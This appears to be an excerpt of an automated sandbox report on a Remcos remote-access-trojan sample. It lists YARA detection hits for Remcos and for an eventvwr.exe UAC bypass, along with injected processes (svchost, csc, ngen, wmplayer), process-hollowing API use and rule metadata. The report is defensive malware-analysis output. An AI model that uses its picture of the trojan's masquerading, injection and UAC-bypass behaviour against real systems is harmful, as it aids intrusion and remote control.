              Source: 39.2.svchost.exe.1c227360bd8.2.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 24.2.svchost.exe.20a4568b350.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 24.2.svchost.exe.20a4568b350.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 24.2.svchost.exe.20a4568b350.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 24.2.svchost.exe.20a45700998.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 24.2.svchost.exe.20a45700998.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 24.2.svchost.exe.20a45700998.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 12.2.svchost.exe.13f4f08c2b8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 12.2.svchost.exe.13f4f08c2b8.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.svchost.exe.13f4f08c2b8.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 9.2.svchost.exe.138aa701bf0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 9.2.svchost.exe.138aa701bf0.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 9.2.svchost.exe.138aa701bf0.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 19.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 19.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 19.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 39.2.svchost.exe.1c2272eb590.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 39.2.svchost.exe.1c2272eb590.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 39.2.svchost.exe.1c2272eb590.1.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 24.2.svchost.exe.20a45700998.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 24.2.svchost.exe.20a45700998.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 24.2.svchost.exe.20a45700998.1.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 29.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 29.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 29.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 9.2.svchost.exe.138aa68c5a8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 9.2.svchost.exe.138aa68c5a8.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 9.2.svchost.exe.138aa68c5a8.1.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 13.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 13.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 13.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 12.2.svchost.exe.13f4f101900.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 12.2.svchost.exe.13f4f101900.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.svchost.exe.13f4f101900.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 13.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 13.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 13.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 12.2.svchost.exe.13f4f08c2b8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 12.2.svchost.exe.13f4f08c2b8.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 9.2.svchost.exe.138aa701bf0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 9.2.svchost.exe.138aa701bf0.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 9.2.svchost.exe.138aa701bf0.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 24.2.svchost.exe.20a4568b350.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 24.2.svchost.exe.20a4568b350.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 39.2.svchost.exe.1c227360bd8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 39.2.svchost.exe.1c227360bd8.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 9.2.svchost.exe.138aa68c5a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 9.2.svchost.exe.138aa68c5a8.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 39.2.svchost.exe.1c2272eb590.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 39.2.svchost.exe.1c2272eb590.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0000000C.00000002.1528643546.0000013F4F016000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0000001D.00000002.1492594141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000001D.00000002.1492594141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001D.00000002.1492594141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 00000009.00000002.1595202046.00000138AA616000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000018.00000002.1546946748.0000020A45615000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000027.00000002.1623163422.000001C227275000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: svchost.exe PID: 7964, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: svchost.exe PID: 8048, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: csc.exe PID: 8164, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: ngen.exe PID: 7544, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: svchost.exe PID: 1072, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: wmplayer.exe PID: 2052, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: svchost.exe PID: 7920, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FF887B23CEA NtUnmapViewOfSection,9_2_00007FF887B23CEA
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_00007FF887B13B8A NtUnmapViewOfSection,24_2_00007FF887B13B8A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,13_2_00414DB4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,19_2_00414DB4
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,29_2_00414DB4
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeCode function: 0_2_00007FF887B2079A0_2_00007FF887B2079A
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeCode function: 0_2_00007FF887B277600_2_00007FF887B27760
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeCode function: 0_2_00007FF887B17F180_2_00007FF887B17F18
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeCode function: 0_2_00007FF887B165900_2_00007FF887B16590
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeCode function: 0_2_00007FF887B28B190_2_00007FF887B28B19
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeCode function: 0_2_00007FF887B1F3290_2_00007FF887B1F329
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeCode function: 0_2_00007FF887B1116D0_2_00007FF887B1116D
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeCode function: 0_2_00007FF887B1C9000_2_00007FF887B1C900
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeCode function: 0_2_00007FF887B23EFA0_2_00007FF887B23EFA
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeCode function: 0_2_00007FF887B17DF80_2_00007FF887B17DF8
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeCode function: 0_2_00007FF887B21C550_2_00007FF887B21C55
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FF887B065909_2_00007FF887B06590
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FF887B07DDD9_2_00007FF887B07DDD
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FF887B0116D9_2_00007FF887B0116D
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FF887B1F8EE9_2_00007FF887B1F8EE
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FF887B1E0799_2_00007FF887B1E079
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FF887B1079A9_2_00007FF887B1079A
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FF887B1C7B59_2_00007FF887B1C7B5
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FF887B18B199_2_00007FF887B18B19
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FF887B0F3299_2_00007FF887B0F329
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FF887B226999_2_00007FF887B22699
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FF887B0B1609_2_00007FF887B0B160
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FF887B0C9009_2_00007FF887B0C900
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FF887B11C559_2_00007FF887B11C55
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FF887B13EFA9_2_00007FF887B13EFA
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 12_2_00007FF887AF659012_2_00007FF887AF6590
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 12_2_00007FF887AF7DDD12_2_00007FF887AF7DDD
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 12_2_00007FF887B0079A12_2_00007FF887B0079A
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 12_2_00007FF887B0C7B512_2_00007FF887B0C7B5
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 12_2_00007FF887AFF32912_2_00007FF887AFF329
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 12_2_00007FF887B08B1912_2_00007FF887B08B19
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 12_2_00007FF887B01C5512_2_00007FF887B01C55
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0042515213_2_00425152
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0043528613_2_00435286
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_004513D413_2_004513D4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0045050B13_2_0045050B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0043651013_2_00436510
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_004316FB13_2_004316FB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0043569E13_2_0043569E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0044370013_2_00443700
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_004257FB13_2_004257FB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_004128E313_2_004128E3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0042596413_2_00425964
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0041B91713_2_0041B917
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0043D9CC13_2_0043D9CC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00435AD313_2_00435AD3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00424BC313_2_00424BC3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0043DBFB13_2_0043DBFB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0044ABA913_2_0044ABA9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00433C0B13_2_00433C0B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00434D8A13_2_00434D8A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0043DE2A13_2_0043DE2A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0041CEAF13_2_0041CEAF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00435F0813_2_00435F08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0042515219_2_00425152
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0043528619_2_00435286
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_004513D419_2_004513D4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0045050B19_2_0045050B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0043651019_2_00436510
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_004316FB19_2_004316FB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0043569E19_2_0043569E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0044370019_2_00443700
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_004257FB19_2_004257FB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_004128E319_2_004128E3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0042596419_2_00425964
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0041B91719_2_0041B917
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0043D9CC19_2_0043D9CC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_00435AD319_2_00435AD3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_00424BC319_2_00424BC3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0043DBFB19_2_0043DBFB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0044ABA919_2_0044ABA9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_00433C0B19_2_00433C0B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_00434D8A19_2_00434D8A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0043DE2A19_2_0043DE2A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0041CEAF19_2_0041CEAF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_00435F0819_2_00435F08
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_00007FF887B1269424_2_00007FF887B12694
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_00007FF887B0C7B524_2_00007FF887B0C7B5
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_00007FF887B0E93E24_2_00007FF887B0E93E
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_00007FF887AF116D24_2_00007FF887AF116D
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_00007FF887AF659024_2_00007FF887AF6590
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_00007FF887AF7DDD24_2_00007FF887AF7DDD
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_00007FF887B01C5524_2_00007FF887B01C55
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_00007FF887B0079A24_2_00007FF887B0079A
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_00007FF887AFF32924_2_00007FF887AFF329
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_00007FF887B0492924_2_00007FF887B04929
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 24_2_00007FF887B08B1924_2_00007FF887B08B19
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0042515229_2_00425152
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0043528629_2_00435286
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_004513D429_2_004513D4
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0045050B29_2_0045050B
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0043651029_2_00436510
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_004316FB29_2_004316FB
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0043569E29_2_0043569E
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0044370029_2_00443700
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_004257FB29_2_004257FB
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_004128E329_2_004128E3
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0042596429_2_00425964
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0041B91729_2_0041B917
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0043D9CC29_2_0043D9CC
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_00435AD329_2_00435AD3
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_00424BC329_2_00424BC3
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0043DBFB29_2_0043DBFB
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0044ABA929_2_0044ABA9
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_00433C0B29_2_00433C0B
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_00434D8A29_2_00434D8A
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0043DE2A29_2_0043DE2A
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0041CEAF29_2_0041CEAF
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_00435F0829_2_00435F08
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 39_2_00007FF887B2A7F239_2_00007FF887B2A7F2
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 39_2_00007FF887B3079A39_2_00007FF887B3079A
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 39_2_00007FF887B3234539_2_00007FF887B32345
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 39_2_00007FF887B38B1939_2_00007FF887B38B19
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 39_2_00007FF887B2F32939_2_00007FF887B2F329
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 39_2_00007FF887B386B039_2_00007FF887B386B0
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 39_2_00007FF887B27DDD39_2_00007FF887B27DDD
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 39_2_00007FF887B2659039_2_00007FF887B26590
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: String function: 00007FF887B20488 appears 53 times
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: String function: 00007FF887B204A0 appears 41 times
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: String function: 00007FF887B20490 appears 53 times
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 00402073 appears 51 times
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 00432B90 appears 53 times
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: String function: 00432525 appears 41 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 00402073 appears 51 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 00432B90 appears 53 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 00432525 appears 41 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: String function: 00402073 appears 51 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: String function: 00432B90 appears 53 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: String function: 00432525 appears 41 times
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 464 -p 7964 -ip 7964
              Source: svchost.exe.0.drStatic PE information: No import functions for PE file found
              Source: LisectAVT_2403002A_136.exeStatic PE information: No import functions for PE file found
              Source: LisectAVT_2403002A_136.exe, 00000000.00000000.1327388383.00000214239C2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLyon.exe* vs LisectAVT_2403002A_136.exe
              Source: LisectAVT_2403002A_136.exeBinary or memory string: OriginalFilenameLyon.exe* vs LisectAVT_2403002A_136.exe
              Source: 29.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 29.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 29.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 19.2.ngen.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 19.2.ngen.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
